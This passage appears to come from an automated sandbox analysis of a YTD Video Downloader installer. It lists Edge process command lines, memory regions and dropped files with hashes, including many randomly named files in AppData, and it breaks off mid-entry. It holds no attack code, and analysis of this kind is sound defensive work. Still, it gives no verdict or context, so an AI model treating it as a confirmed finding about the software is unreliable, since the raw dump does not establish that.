"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2

Network

Files

memory/1028-0-0x0000000000400000-0x0000000000501000-memory.dmp

memory/1028-2-0x0000000000401000-0x00000000004B7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp

MD5 34fb289e9fee64cd7d4b588f0af35a87
SHA1 749822f7891caaca3fcda698a1f3a88afa76b26c
SHA256 61fbf0a6084bd7bab3ed214f1c372a569af302ee353e59ddb4f9f65436bf9b55
SHA512 9bc594e241747faadb3295792eff37c76a6f4ff1a0f0c91e63fd45905da15239a1aed8bba55006f32310633609fa43132616cbea30b3a104843f2b553b58adaa

memory/1576-6-0x0000000000400000-0x0000000000723000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\_isetup\_isdecmp.dll

MD5 c6ae924ad02500284f7e4efa11fa7cfc
SHA1 2a7770b473b0a7dc9a331d017297ff5af400fed8
SHA256 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512 f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe

MD5 37c8ee1cae9779ec094be29a35a5061d
SHA1 ae99157bda438ad024e38dd91a975246b00dd557
SHA256 0ac4b34f2a8f9c004f6c942ce112a0ab87bb1c2b17a7dd745519eb414ebdae35
SHA512 e725a2ec6f3550e8de89b200f4bb79f808f14d6da04d4a80629ecb1b428ba0c74a0468e7b7bb53d89744bbba19066f4799e3a84951d21215ce0b72edf0798728

C:\Users\Admin\AppData\Local\Temp\nseC304.tmp\NSISHelper.dll

MD5 373c6ac98ae82cf341394215d28b5830
SHA1 2e3542372f1e520cdd47d30035dda85fdd2b11f9
SHA256 5cfd1ab1740c4a68cae314157468423dcd7b0ffe873b91257e10fa28169a7d18
SHA512 6d0a31a6c5c4b965633f943eaa15d3495be072f035d97deac27690d6a6a6890a8f817b406153fbba5a8862675b4f3015ac9e93fc8b6d90b1c4b029857123a117

C:\Users\Admin\AppData\Local\Temp\nseC304.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nseC304.tmp\nsisdl.dll

MD5 ba2cc9634ebed71cea697a31144af802
SHA1 8221c522b24f4808f66a476381db3e6455eab5c3
SHA256 9a3c2fe5490c34f73f1a05899ef60cfef05e0c9599cd704e524ef7a46ead67ba
SHA512 dcc74bcedd9402f7ac7e2d1872fe0e2876ae93cf8bbd869d5b9b7b56cea244ba8d2891fa2b51382092b86480337936f5ec495d9005d47fbfd9e2b71cb7f6ba8f

C:\Users\Admin\AppData\Local\Temp\nseC304.tmp\UserInfo.dll

MD5 9eb662f3b5fbda28bffe020e0ab40519
SHA1 0bd28183a9d8dbb98afbcf100fb1f4f6c5fc6c41
SHA256 9aa388c7de8e96885adcb4325af871b470ac50edb60d4b0d876ad43f5332ffd1
SHA512 6c36f7b45efe792c21d8a87d03e63a4b641169fad6d014db1e7d15badd0e283144d746d888232d6123b551612173b2bb42bf05f16e3129b625f5ddba4134b5b8

C:\Users\Admin\AppData\Local\Temp\nseC304.tmp\nsDialogs.dll

MD5 466179e1c8ee8a1ff5e4427dbb6c4a01
SHA1 eb607467009074278e4bd50c7eab400e95ae48f7
SHA256 1e40211af65923c2f4fd02ce021458a7745d28e2f383835e3015e96575632172
SHA512 7508a29c722d45297bfb090c8eb49bd1560ef7d4b35413f16a8aed62d3b1030a93d001a09de98c2b9fea9acf062dc99a7278786f4ece222e7436b261d14ca817

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe

MD5 b1934b07dd28fe1ba94df3861128402b
SHA1 c5d918e696059437dacffa8c3359ee31e97e6e06
SHA256 2670c0406f42be2455f3a20e3ae8b024a41c46b956df9214cb63ca1efa18b17e
SHA512 e863702d96a1a8371403933d9a0e082498d15a39fcf0bedb981913981f8cd9dab64e54202c4a7f2b4c6e4407fd3a7bdb9b0a96340b258476cf59057e80cbbc7f

memory/1028-139-0x0000000000400000-0x0000000000501000-memory.dmp

memory/1576-141-0x0000000000400000-0x0000000000723000-memory.dmp

memory/2912-143-0x0000000005340000-0x0000000005376000-memory.dmp

memory/3680-144-0x0000000004DC0000-0x00000000053E8000-memory.dmp

memory/1520-146-0x00000000061E0000-0x0000000006246000-memory.dmp

memory/1520-147-0x0000000006250000-0x00000000062B6000-memory.dmp

memory/1520-145-0x0000000006140000-0x0000000006162000-memory.dmp

memory/1520-163-0x00000000062D0000-0x0000000006624000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vlioe40t.gjm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1576-254-0x0000000000400000-0x0000000000723000-memory.dmp

memory/1028-256-0x0000000000400000-0x0000000000501000-memory.dmp

memory/1520-252-0x0000000006EA0000-0x0000000006EEC000-memory.dmp

memory/1520-251-0x00000000068E0000-0x00000000068FE000-memory.dmp

C:\Users\Admin\d4c96d281fd0f998028d3d01bfc34319\d83898868d3ea2886e940309afb0d975\add01c2553610a23ebc2f315949f35d4\558732735d58c0d6df02d0db147134e2\b67aff63b5589771446b4ba1056a0a70\a23569a279f49e7862d059e43fd1efa5\1d665c87ae5382646caaac5af0879c63

MD5 534663c23d71911a74d42510bd20a035
SHA1 0b634216f6b035edfafdccd861077c6d48734958
SHA256 3accca2af3b6f02d42eb4db86e49dbff6dace4a4d62fc3859cafd268b8751d50
SHA512 08c90730895189e9ade2f0bc83c1c9e8ebb53e57323d8562bd21f66afc38b592185bac06519678bfdd6168e3544bc63ddc5340269174125e8bad07d06dcef114

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlccore.dll

MD5 3c07164ceba1068ee3eff672d8e11eb6
SHA1 c96d644ad20a788100609061c052220828784a09
SHA256 170a18f9d841606432b9157f243c43c7a2d53bf1fc028a147bd15f505749e69a
SHA512 af48e1d10f442789df7edaa89b7364f7670134af7f8c624b22073eadaf3516cf10aab196b411835afb839c0256314eb3d75fec37afe3f78f5e5fe123b3ffef4f

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlc.dll

MD5 ded3aa6b7920334e6b334eaed3db96c5
SHA1 43ddc57d22dce102a3687e548bd36e32fe20495e
SHA256 feed76629d5f9dbe7401a326994e80b003ca5fe1cf876029e4707a71bf4b5860
SHA512 aeec44f69d430a544594433a8e830af075cad27a7dfe83401ee82e51a949d1140e253ee49f786b944ddf98f513f3754eda6bf0311288eddf7ad1a73d8110de9c

memory/1520-285-0x0000000006D80000-0x0000000006D9A000-memory.dmp

memory/1520-293-0x00000000081B0000-0x0000000008754000-memory.dmp

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\scripts.yds

MD5 d8ced7c2193354757988028fbdbf197e
SHA1 23e7c13471207cc7abd0267f11f9c814bece7011
SHA256 6b384b1e208a2260f54e3d003449c53c03acd8947c8762060fd9e9832dc3bd9c
SHA512 96db2348c6c8f00fb14321b3b816a1a59a60bc54f66002253d6ac43768c94aca5ec3435069e17a23426034bd583c350cdfbcb9daf4b258a8fd485bc96a34f908

memory/1520-286-0x0000000006DD0000-0x0000000006DF2000-memory.dmp

memory/1520-284-0x0000000007960000-0x00000000079F6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e765f3d75e6b0e4a7119c8b14d47d8da
SHA1 cc9f7c7826c2e1a129e7d98884926076c3714fc0
SHA256 986443556d3878258b710d9d9efbf4f25f0d764c3f83dc54217f2b12a6eccd89
SHA512 a1872a849f27da78ebe9adb9beb260cb49ed5f4ca2d403f23379112bdfcd2482446a6708188100496e45db1517cdb43aba8bb93a75e605713c3f97cd716b1079

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_output\libdirectsound_plugin.dll

MD5 46672363f47a25d69a5324045f4e8d63
SHA1 f0d65ad9301f953f7b604087d27ce3e600891250
SHA256 0a2f80092b426f11dbf54b10542d3d7b45d2e40fc575e8e0e73cdcca47b4885d
SHA512 24b52206390b04cb909a1da12b46294f2aa848a42c27a6d765e6666ffbf86f64bac929e9210723d5c537a11d015d2f556e39821d01310a328cf41c988a25146b

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libinteger_mixer_plugin.dll

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libfloat_mixer_plugin.dll

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libugly_resampler_plugin.dll

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libaudio_format_plugin.dll

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\access\libfilesystem_plugin.dll

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libwingdi_plugin.dll

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libvmem_plugin.dll

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdrawable_plugin.dll

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdirect3d_plugin.dll

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_filter\libswscale_plugin.dll

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\codec\libavcodec_plugin.dll

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

\??\pipe\LOCAL\crashpad_3028_JWJVHCDTVCCWLVXQ

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\RlEKhDAJNzbPeQ.vxiwhopcDsCngBzVNul

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\iXMQpYCrnzlTSeRoIK.eSRprJviGdXIHqTo

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\KGjbIPfVMmWOXSniZU.UXaSrkvhRPICbd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\PCkLAiDpjTaONMBn.PFoumAKaGObzwR

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\NhLCMKjDqdaA.woJgvRptahuZ

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\PrplCEkJGw.BoLmlNWJqnIedRQ

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\iMmSsxJoTnPqHQK.IiEPcadAJNY

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\LZSyYVOBARGfCn.fhMNtVKYzpoqTmWB

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\mTPCbJxBaDSX.sQCHemDZfJV

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\abEqvFkugOGVH.LSTxcmbMjfPnrZl

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\vlbgNJAFPhZ.HKwnlsmFoGEyLAg

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\DcLBVJaFHyvdkOPqT.lQvoUTahscEgFbP

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\hdEGzPlerTUSv.HJOyvYpQzUbCDGcF

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\jMzmBSArKNRGeibqL.kEmRQePCtBIs

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\GDZtSJXfdROaExFuwBg.NJzRUtdicnKrHX

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\QzJxeXghME.pwXyIYfRKtdbBCqO

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\QFJykYnUspe.GkPgFdHzeTJjiVB

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\KlNQDbcmyrLZfOSvR.DLAQHWcbISTf

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\jbGpBZTzSK.voaPxSYVXltNWzEI

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\fsiCTxnPHFqylEejvr.NmiDgtbGfjAexXrQh

C:\Users\Admin\AppData\Roaming\Microsoft\roKdFIYfCAcWaumehQ\JlqFpNrvRig.hFADqOLQwnRlVc

C:\Users\Admin\AppData\Roaming\Microsoft\roKdFIYfCAcWaumehQ\aFRxchnfAW.WNBHOGptasF

C:\Users\Admin\AppData\Roaming\Microsoft\hbidaOgyoAsjDp\XgnyZEeGRUfW.ZWpzSNbHLfxRuQD

C:\Users\Admin\AppData\Roaming\Microsoft\RmDloHBSkgfJqnhI\TefaGgHihr.XicGOFSwkhlezCMyvLb

C:\Users\Admin\AppData\Roaming\Microsoft\RmDloHBSkgfJqnhI\kwGeNxFCnvhXRiK.GDejEQOBvHSRrXqAVUM

C:\Users\Admin\AppData\Roaming\Microsoft\RmDloHBSkgfJqnhI\YJvRVruhtegSmIsp.KMDyBlNZFuIcP

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\dsQeGlchjSIXYB.DgdqbvHuFzaYSO

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\ewtMHOXCqgPjmBRIaY.uzekhSvYHpAQCqRVF

C:\Users\Admin\AppData\Roaming\Microsoft\RmDloHBSkgfJqnhI\QFZskxvaHDd.FTzlrWSHuRiIeGqdLsn

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\HSWmIUtBea.ydoRVXHwnJmfYeguvG

C:\Users\Admin\AppData\Roaming\Microsoft\hbidaOgyoAsjDp\gGjUDsavcY.enyvRfHobEtcMFl

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\ywJsuGrjIDNTR.GsfxInESVlyJ

C:\Users\Admin\AppData\Roaming\Microsoft\hbidaOgyoAsjDp\ZzSRBGQDugcfT.VWZCypqERuYF

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\TQLfFxICjwu.YGOAJydMKLkFD

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\QCZqHjuBpkJSaDEN.ioHVcXkDCMsmAldQ

C:\Users\Admin\AppData\Roaming\Microsoft\roKdFIYfCAcWaumehQ\JsnftTirRy.uONBSrZiqDayYK

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\QYdzIgkBOmu.oFgnGuErvyhbecYwjk

C:\Users\Admin\AppData\Roaming\Microsoft\RmDloHBSkgfJqnhI\YaovZjDwSxVcpMCGBO.aSCvBFHZwNEXkrg

C:\Users\Admin\AppData\Roaming\Microsoft\RmDloHBSkgfJqnhI\PXcOSNylZdB.hPxiXyZBLWVCGvJR

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\MNenZxlrzCIjcT.IVfYdWaQJOTZg

C:\Users\Admin\AppData\Roaming\Microsoft\hbidaOgyoAsjDp\RMdFCJclHy.agISFneosABLDQzYqHk

C:\Users\Admin\AppData\Roaming\Microsoft\roKdFIYfCAcWaumehQ\ideYZhcCnsmgD.uqVZENCnoBxIt

C:\Users\Admin\AppData\Roaming\Microsoft\hbidaOgyoAsjDp\DVPNBKkMwbunfzhoL.TAFUmBEzRXjJNl

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\gfwTzPjunxCGLoYsq.HisqbhymRzAtdV

C:\Users\Admin\AppData\Roaming\Microsoft\RmDloHBSkgfJqnhI\VzjwItxrqaSZyTGCYgF.gKihVxyBWLUdmMF

C:\Users\Admin\AppData\Roaming\Microsoft\roKdFIYfCAcWaumehQ\AepqkfXuOKJnBm.hRpJqoVGPOcTY

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\CiIQEPMOYjGR.mhCqcFiKRuf

C:\Users\Admin\AppData\Roaming\Microsoft\RmDloHBSkgfJqnhI\QnRrWmhzKgsVqG.QSGCeRUnca

C:\Users\Admin\AppData\Roaming\Microsoft\RmDloHBSkgfJqnhI\RgNkLHhIjQveGSP.YDsNjlVxpJO

C:\Users\Admin\AppData\Roaming\Microsoft\hbidaOgyoAsjDp\FDCtARNzauBKGZOqe.kngBXbJshirvECwMlV

C:\Users\Admin\AppData\Roaming\Microsoft\hbidaOgyoAsjDp\uTWvXldEsVog.qVvQLJyxwUXtPAoCbGN

C:\Users\Admin\AppData\Roaming\Microsoft\hbidaOgyoAsjDp\dHVRfmqTZktP.vgEYnyxPzOqWhJkVZ

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\NfXHGRwSkeahnAW.PmVCcQRIFqWduJ

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\oUkFWHYPbQ.JzNRsBOwFS

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\ZzoclTsBqpHrbY.TJvbiWSqhXezFoNgd

C:\Users\Admin\AppData\Roaming\Microsoft\roKdFIYfCAcWaumehQ\dAyvBIlHOYLrZqKR.akWMXQEsRIgGcjAYz

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\XPOGnhrSoFeYRETvNAZ.LodyfWRDUGuEMti

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\JtBAMNlduGOag.tmFizsLAqZaQ

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\pbUVgkDRxFdzJjYe.LIWZvENzqmpwAGsRKo

C:\Users\Admin\AppData\Roaming\Microsoft\hbidaOgyoAsjDp\FTUBsfzrEAOaKdkGZi.mdCHPivQNSM

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\iogljmpLJPeF.LwyktcCJnpXWrMxjE

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\tFwXequmvOGcbzio.nFHNuGhLWKUfBSP

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\afQmKxRXAIHPWNJ.TbfEoNlCKeycvHPxYd

C:\Users\Admin\AppData\Roaming\Microsoft\IbPYVgHOnWLRyaw\CTUsYuNZtOm.SROpeBfiDuY

MD5 f846c1a78b50932333cf40b161270967
SHA1 5f176c3878927f0466c67718c6c4f8c47f0b372f
SHA256 6ef320e2909ab8f06b79f298137cab0e2b273e6fe4d754ac3d56131fae8e816b
SHA512 c513e12f01be78305f8df7c619a4e16951c5953cb49ded80c8b0abd8ab11f2322a753af465b09feac7fb37ea3e3dbe0f84034cb362386b9df18c531b08ce9f47

C:\Users\Admin\AppData\Roaming\Microsoft\hbidaOgyoAsjDp\JdVsRHQbLc.YTtSBUoVrG

MD5 41aede93e8ef0e4019bea3b0998418a4
SHA1 1d1698feaa30ae71fb36a125e4d11d3a32a1efc6
SHA256 e1fec455ace90294cf03d898bec10f4d524921d35c08207cda7787f513d86b75
SHA512 60421f98b28ee05048f83f405eb8b970c636dc5b08f0b1b61b7cf8072b49fbbf2212871c487d3763f9d63947e011142a123738f7da6e750963b397147d9b808d

C:\Users\Admin\AppData\Roaming\Microsoft\RmDloHBSkgfJqnhI\VjmyOcGXZapTu.uKVDrOhLYmkRfCptyBv

MD5 5e9665704dfc8defb7eade6629997960
SHA1 99f872b68e109580904707530482587a7ffa7fea
SHA256 786b44c3fdd45500ceb2ac0baa4451f27a7b3c35ce81c6ae0c22f93b6a4b8752
SHA512 430eec2f76517ef78cae18475399f02f23caad20b1ad191cd57e10733c10c617c883288f1d5ff6024191e44e7db80abecbea97eaf92391083475abd7b2eb651a

C:\Users\Admin\AppData\Roaming\Microsoft\RmDloHBSkgfJqnhI\MKwDoJgFmSGbVPlzOH.DhrpljaGcCqJs

MD5 ca39cbf6c1dcda7f6d28c509483c651a
SHA1 4f9b438b2c5ccc8a00c9223bd29c5c5e114aa968
SHA256 26969121c857da3af1c759d6283c2e70a32b8f1c3fc909f0827647478fc23bdf
SHA512 c2bafd5c19519557b7e5d31f11e19a1347121dcc166c0741f0545e520080ce4b89da4461f242b763a4ad25b463dd8b45576a28c6de87b7b90b37758866f146e7

C:\Users\Admin\AppData\Roaming\Microsoft\roKdFIYfCAcWaumehQ\UzRlmISJXPL.WpGgauQTAvcFtxrB

MD5 565f2a199151c6188a404edfa1a58122
SHA1 15ce5f526c2cb90cdcebc236458519291861b330
SHA256 1942e3cb5ae32add526fb59620c7820adebe3aa459517cb1a35db30fcffc9659
SHA512 1519e5e014af0e61c931f91910588d997caff1c7484bc74cc4986d750e628ba57689e888b2d47ad568b062b02a338463b1374e110c6afa191a247d3b0d561285

C:\Users\Admin\AppData\Roaming\Microsoft\roKdFIYfCAcWaumehQ\BlcMOsDfoJVXqCE.RCHAlEKhyuxDzWmrge

MD5 7c2ccba1df495a60da1a40e15a323d45
SHA1 1f8f5f6bef4849f8980c4334715ec28a324929c8
SHA256 b1a7df41c8d5163cf04c3da31321d36eee828c069e16db1e8288e899c33a3e52
SHA512 138a14b5319368f15888bc4fac51f09aebd7db2941c4e2f863405e0e1ef80cd726e0c0a6aae49ae956d54617dee9833e85f2953cb43a4d9a042e969b6633f3df

C:\Users\Admin\AppData\Roaming\Microsoft\RmDloHBSkgfJqnhI\xqjozkWgfTMUhJ.BqVFuMycKLtov

MD5 5fff58a2ec09ee36ffb3b1716941dda8
SHA1 dd01ad915871834172f94c8a164227c93fa6101d
SHA256 e5fc58634eac3d1720faa81d10c3098e920f37ef4814d4b62af1e71643f5bde1
SHA512 b9c8ec6534d20d6f604ce20a33a793db3f4ac76f6aa5492552c99b517c6387bafbfb93445e0dc0090aac87234b8305f2610eaa25dc049314a24c4554e0b6ca35

C:\Users\Admin\AppData\Roaming\Microsoft\hbidaOgyoAsjDp\MGiqxnmVSKHs.xVPvMRftWjokdph

MD5 ce00d6cfbac72a870cc29f365773874d
SHA1 5cd4e86c5fb6f414a671af75fc675b1a15454da6
SHA256 d635e85a5023c18eb4287ecf0364add6c4e52349d0acbbc28de13faf0c24b58a
SHA512 b0dec5b20528ebb9dd29d05538554843c6b4acc64867bef02c16641c9254f170a64bafc0b6b877d2191e8332a321334cca0e4a3fd2a32f139ea57c0f01f785c8

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\dRCPziSeIUfArpmO.NnrBEkTdatf

MD5 3b9f688553b0ff6cdfdff3a8c6ff684f
SHA1 3058c1b1e5c0b8b061db5b19dd316a3b87e4b854
SHA256 e45722f9d1468cd46eacd08d97805dfad927484db3fba33edb98c97fa6a1277c
SHA512 a4389677321a540a194d30f55cc7cc4c0234c74e3fdba560601bb19dd9fbca546e9b639d51564b2c9aa8beefe1d239ad7e32d8319ecacc48fd14c65752a4f8aa

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\TlVNpkxERUsh.dDZFGvohITqfmakwC

MD5 42b081d6d37c04d968812426151ba8d5
SHA1 544ee696c029d72fc6083dd177d73860f2c4ba85
SHA256 e9c2e1e2e68e113a9f14325302f869da01ab28a092c3f6f692c530a359301149
SHA512 99d614c76d70818b76f80bbe0fc807d28f37f6706878b5fa2b406a4af8cd2a2046d3dcab19fd6ed91cc0841dec5c9bafaf3f1dfabb4c30a2340fb4807eaf1e5f

C:\Users\Admin\AppData\Roaming\Microsoft\RmDloHBSkgfJqnhI\cFGYjgbJauP.fkAojYtOuTGWDHhQRS

MD5 0630f2c2209cc8d15730247913c189c5
SHA1 083323accb7b82b353b9fe05f65c57e56eb41cab
SHA256 ea6cdf091a7b643c8f076398b0e54f519944033ca1501e4899de92a5b2bb8438
SHA512 3637ebcca51a870cacdf63782729e9c69c89715ebc1d3c585da3277462bd9710bf77c739a6b3201443067ef587df07edb68a6520e5ee876a6d60988d3197f93d

C:\Users\Admin\AppData\Roaming\Microsoft\roKdFIYfCAcWaumehQ\wzJrfUHinCsXLTSW.LTxWCEiSkXNQ

MD5 8f72817c1934cc7abb97abcb6070d111
SHA1 dd8bcc4bc2ad0a4fb560f03a2f3dedce12e2b75f
SHA256 ec608de9047876128c0ee98a6f395f0a87ca111d49df73302e4de2f5b66c4cd5
SHA512 c4d4b56e5dcb854cac076525c3b7fc2adfcf62594bcba5eb98dc2cf61e09efbbad8674cba45770ff8014fe6dc2f824582386758781605addef75f62f046d9789

C:\Users\Admin\AppData\Roaming\Microsoft\WZkcTmGBguVCNYhSan\SPkgFfWind.URZVPgnHXcrF

MD5 05549d1bff99eabb2bb0be3b7bf0054d
SHA1 6bd2a9ea62648e5f3d46fdb7f2e39596b2d304c2
